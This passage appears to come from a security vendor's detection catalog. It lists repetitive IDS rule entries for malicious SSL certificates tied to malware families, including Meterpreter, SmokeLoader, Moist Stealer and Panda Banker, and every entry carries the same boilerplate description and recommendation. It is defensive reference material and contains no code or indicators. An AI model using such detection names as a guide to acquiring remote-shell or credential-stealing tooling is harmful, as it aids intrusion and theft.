  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MalDoc DL 2020-02-21)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MalDoc DL 2020-02-21 2)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MalDoc DL 2020-02-21 3)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MalDoc DL 2020-05-27)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MalDoc DL 2020-06-18)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MalDoc DL 2020-07-29)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Malicious Browser Ext CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Malicious Browser Ext CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MassLogger)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Meterpreter Paranoid Mode CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MICROPSIA CnC Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MINEBRIDGE/MINEDOOR CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MINEBRIDGE/MINEDOOR CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MINEBRIDGE/MINEDOOR CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MINEBRIDGE/MINEDOOR CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MINEBRIDGE/MINEDOOR CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Mirrortheif group)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MirrorThief CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MirrorThief CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Moist Stealer CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MonetizUs/LNKR)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MonetizUs/LNKR)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (More_eggs CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MosaicRegressor WinHTTP Downloader)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MSIL/Agent.TRM CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (NHS UK Covid Passport Phish)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (OceanLotus APT CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (OilRig QUADAGENT CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (OSX/AppleJeus Variant CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (OSX/Nukesped CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (OSX/Nukesped CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (OSX/Nukesped CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (OZH Rat)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Panda Banker C2)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Panda Banker Injects)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (PhantomNet/Smanager CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (PHPs Labyrinth Stage1 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Possible APT33 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Possible Godlua CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (POWERRATANKBA CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (POWERSTATS Proxy CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (POWERSTATS Proxy CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Python RAT (Aurora Campaign))

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Quasar CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (RampantKitten CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (RampantKitten CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ReactGet Group)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (SedUploader)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ServHelper CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ServHelper CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ServHelper CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ServHelper CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ServHelper CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ServHelper CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ServHelper CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ServHelper CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ServHelper CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ServHelper CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ServHelper CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ServHelper CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ServHelper CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ServHelper CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ServHelper RAT CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ShadowHammer CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Sidewinder APT CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Sidewinder APT CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Sidewinder APT CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (SideWinder APT CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious SSL Cert (Sidewinder CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Sidewinder CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Sidewinder CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Sidewinder CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Silver Implant)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (SmokeLoader CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (SmokeLoader CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (SmokeLoader CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Strongpity CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (StrongPity CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (StrongPity CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (StrongPity CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (StrongPity CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (StrongPity Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (StrongPity Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (StrongPity Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (StrongPity Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (TaurusStealer CnC)

Description
Copy link

